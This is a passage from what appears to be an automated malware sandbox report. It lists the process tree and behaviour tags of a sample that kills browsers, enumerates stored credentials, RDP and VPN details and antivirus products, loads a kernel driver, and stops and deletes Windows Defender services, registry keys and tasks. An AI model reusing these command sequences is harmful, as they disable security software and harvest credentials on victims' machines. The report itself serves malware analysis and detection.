        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x258,0x7ffd493af208,0x7ffd493af214,0x7ffd493af220
        8⤵
        
        PID:2160
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2584,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:2
        8⤵
        Modifies registry class
        
        PID:5332
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2836,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:3
        8⤵
        
        PID:2756
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2880,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2888 /prefetch:8
        8⤵
        
        PID:4552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=42816 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3332,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=42816 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3060,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4892,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:8
        8⤵
        
        PID:528
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4992,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:8
        8⤵
        
        PID:4612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5100,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:8
        8⤵
        
        PID:1280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5100,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:8
        8⤵
        
        PID:216
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:3856
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        7⤵
        Kills process with taskkill
        
        PID:6032
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5736
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM msedge.exe
        7⤵
        Kills process with taskkill
        
        PID:5536
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM brave.exe
        7⤵
        
        PID:5500
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM opera.exe
        7⤵
        Kills process with taskkill
        
        PID:716
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM vivaldi.exe
        7⤵
        Kills process with taskkill
        
        PID:2172
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM firefox.exe
        7⤵
        Kills process with taskkill
        
        PID:2412
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM dragon.exe
        7⤵
        Kills process with taskkill
        
        PID:4708
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM maxthon.exe
        7⤵
        Kills process with taskkill
        
        PID:4308
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM uc_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:1072
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM slimjet.exe
        7⤵
        
        PID:5088
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM cent_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:2404
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM epic.exe
        7⤵
        Kills process with taskkill
        
        PID:1704
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM torch.exe
        7⤵
        Kills process with taskkill
        
        PID:2584
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3856
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM whale.exe
        7⤵
        Kills process with taskkill
        
        PID:2552
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM 360browser.exe
        7⤵
        Kills process with taskkill
        
        PID:5856
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM qqbrowser.exe
        7⤵
        
        PID:436
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM browser.exe
        7⤵
        Kills process with taskkill
        
        PID:3688
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5652
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        7⤵
        Kills process with taskkill
        
        PID:3108
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM brave.exe
        7⤵
        Kills process with taskkill
        
        PID:4836
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM opera.exe
        7⤵
        Kills process with taskkill
        
        PID:5020
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM vivaldi.exe
        7⤵
        
        PID:1936
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM firefox.exe
        7⤵
        Kills process with taskkill
        
        PID:4040
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM dragon.exe
        7⤵
        
        PID:4764
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM maxthon.exe
        7⤵
        Kills process with taskkill
        
        PID:3608
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM uc_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:3484
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM slimjet.exe
        7⤵
        Kills process with taskkill
        
        PID:4988
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM cent_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:5508
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM epic.exe
        7⤵
        Kills process with taskkill
        
        PID:4712
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM torch.exe
        7⤵
        Kills process with taskkill
        
        PID:3648
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM whale.exe
        7⤵
        Kills process with taskkill
        
        PID:4804
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM 360browser.exe
        7⤵
        Kills process with taskkill
        
        PID:4564
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM qqbrowser.exe
        7⤵
        Kills process with taskkill
        
        PID:4872
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM browser.exe
        7⤵
        Kills process with taskkill
        
        PID:4908
        
        C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        7⤵
        
        PID:2828
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:5632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5316
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        8⤵
        
        PID:3036
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        7⤵
        
        PID:380
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store -user My
        7⤵
        
        PID:4532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        Suspicious behavior: EnumeratesProcesses
        
        PID:5728
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:4824
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list:TERMSRV/69.48.201.74
        7⤵
        
        PID:3620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
        7⤵
        
        PID:2304
        
        C:\Windows\system32\hostname.exe
        
        "hostname"
        7⤵
        
        PID:3244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
        7⤵
        
        PID:4472
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5088
        
        C:\Windows\system32\netsh.exe
        
        "netsh" advfirewall show allprofiles state
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5464
      - C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:396
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4464
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADA5.tmp\ADA6.tmp\ADA7.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        8⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1880
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE8F.tmp\AE90.tmp\AE91.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:2944
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:4816
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2564
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:5520
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4056
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2952
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5028
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4768
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:3460
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1460
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:3652
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        
        PID:2068
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2160
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:4032
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:2844
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        
        PID:4040
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:3108
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:5832
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:2756
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:5776
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5192
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:4596
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        
        PID:4652
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        
        PID:4772
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        
        PID:4524
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4752
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:1980
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        
        PID:3664
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:5984
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1696
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:1440
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:5408
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:432
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:880
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:224
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:1932
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:868
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:5412
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5176
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:3728
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:1280
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4264
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1156
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:1588
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5780
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:4744
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:876
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4776
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:5140
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:4764
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:744
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3976
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:688
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5380
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:4724
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:5012
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:6096
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:4380
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:1704
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2040
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4708
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADD4.tmp\ADD5.tmp\ADD6.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2412
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE80.tmp\AE81.tmp\AE82.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:1612
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:3068
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4264
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:3620
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2152
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4268
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1608
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5380
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4724
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        
        PID:1304
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:2700
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:4380
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        
        PID:4132
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:6032
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:2176
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:1752
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:3376
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:1920
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:3640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:3056
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:404
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        
        PID:5652
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:4584
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4604
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        
        PID:5040
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4736
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:4576
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:3940
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:1220
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:4980
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:4548
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:5164
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:5336
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:4692
        
        C:\Windows\system32\reg.exe
        
